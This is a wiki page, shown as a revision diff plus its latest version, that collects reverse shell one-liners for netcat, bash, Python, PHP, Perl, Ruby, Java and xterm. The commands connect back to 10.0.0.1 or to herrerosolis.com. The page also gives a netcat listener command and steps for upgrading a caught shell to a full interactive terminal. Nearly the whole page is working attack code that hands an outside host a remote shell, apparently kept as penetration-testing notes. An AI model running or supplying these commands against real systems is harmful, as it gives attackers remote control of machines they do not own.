Difference between revisions of "Reverse Shells"
Jump to navigation
Jump to search
Rafahsolis (talk | contribs) m Tag: visualeditor |
Rafahsolis (talk | contribs) m Tag: visualeditor |
||
| (5 intermediate revisions by the same user not shown) | |||
| Line 1: | Line 1: | ||
| − | http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet | + | <references />http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet |
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ | https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ | ||
| − | == Netcat == | + | ==Netcat== |
| − | === with -e support === | + | ===with -e support=== |
<syntaxhighlight lang="bash"> | <syntaxhighlight lang="bash"> | ||
nc -e /bin/sh 10.0.0.1 1234 | nc -e /bin/sh 10.0.0.1 1234 | ||
</syntaxhighlight> | </syntaxhighlight> | ||
| − | === Without -e suport === | + | ===Without -e suport=== |
<syntaxhighlight lang="bash"> | <syntaxhighlight lang="bash"> | ||
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f | ||
</syntaxhighlight> | </syntaxhighlight> | ||
| − | == Python == | + | ==Python== |
| + | <br /> | ||
| + | ===Python 2.7 (Linux)=== | ||
| + | <syntaxhighlight lang="python"> | ||
| + | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("herrerosolis.com", 8000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' | ||
| + | </syntaxhighlight><syntaxhighlight lang="python"> | ||
| + | import socket,subprocess,os; | ||
| + | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) | ||
| + | s.connect(("herrerosolis.com",8000)) | ||
| + | os.dup2(s.fileno(),0) | ||
| + | os.dup2(s.fileno(),1) | ||
| + | os.dup2(s.fileno(),2) | ||
| + | p=subprocess.call(["/bin/sh","-i"]) | ||
| + | </syntaxhighlight> | ||
| − | + | ==Python 3== | |
| − | <syntaxhighlight lang=" | + | <syntaxhighlight lang="bash"> |
| − | + | python3 -c 'import socket,os,pty; s=socket.create_connection(("herrerosolis.com",8000)); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; os.putenv("TERM","xterm-256color"); pty.spawn("/bin/bash")' | |
</syntaxhighlight> | </syntaxhighlight> | ||
| − | == PHP == | + | ==PHP== |
<syntaxhighlight lang="php"> | <syntaxhighlight lang="php"> | ||
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' | php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' | ||
</syntaxhighlight>if it doesn't work try php4 php5 php6... | </syntaxhighlight>if it doesn't work try php4 php5 php6... | ||
| − | == Bash == | + | ==Bash== |
<syntaxhighlight lang="bash"> | <syntaxhighlight lang="bash"> | ||
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 | bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 | ||
</syntaxhighlight> | </syntaxhighlight> | ||
| − | == Perl == | + | ==Perl== |
<syntaxhighlight lang="perl"> | <syntaxhighlight lang="perl"> | ||
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' | perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' | ||
</syntaxhighlight> | </syntaxhighlight> | ||
| − | == Ruby == | + | ==Ruby== |
<syntaxhighlight lang="ruby"> | <syntaxhighlight lang="ruby"> | ||
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' | ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' | ||
</syntaxhighlight> | </syntaxhighlight> | ||
| − | == Java == | + | ==Java== |
<syntaxhighlight lang="java"> | <syntaxhighlight lang="java"> | ||
r = Runtime.getRuntime() | r = Runtime.getRuntime() | ||
| Line 49: | Line 62: | ||
</syntaxhighlight> | </syntaxhighlight> | ||
| − | == xterm == | + | ==xterm== |
<syntaxhighlight lang="bash"> | <syntaxhighlight lang="bash"> | ||
xterm -display 10.0.0.1:1 | xterm -display 10.0.0.1:1 | ||
| Line 68: | Line 81: | ||
</syntaxhighlight> | </syntaxhighlight> | ||
| + | |||
| + | == Reverse Shell Listener == | ||
| + | <syntaxhighlight lang="bash"> | ||
| + | nc -lvp 8000 -k | ||
| + | </syntaxhighlight> | ||
| + | [[Category:Hacking]] | ||
| + | [[Category:WebShell]] | ||
| + | [[Category:WebShells]] | ||
Latest revision as of 08:35, 17 September 2025
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
Netcat[edit]
with -e support[edit]
nc -e /bin/sh 10.0.0.1 1234
Without -e suport[edit]
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
Python[edit]
Python 2.7 (Linux)[edit]
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("herrerosolis.com", 8000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("herrerosolis.com",8000))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
Python 3[edit]
python3 -c 'import socket,os,pty; s=socket.create_connection(("herrerosolis.com",8000)); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; os.putenv("TERM","xterm-256color"); pty.spawn("/bin/bash")'
PHP[edit]
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
if it doesn't work try php4 php5 php6...
Bash[edit]
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Perl[edit]
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Ruby[edit]
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Java[edit]
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
xterm[edit]
xterm -display 10.0.0.1:1
Upgrading nc shell[edit]
$ stty -a # to get rows and columns from your machine
$ nc -lvp 444 # connect from the attacked machine
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl + Z
$ stty raw -echo
$ fg 1
$ reset
$ export SHELL=bash
$ export TERM=xterm256-color # linux | screen
$ stty rows 55 columns 211
Reverse Shell Listener[edit]
nc -lvp 8000 -k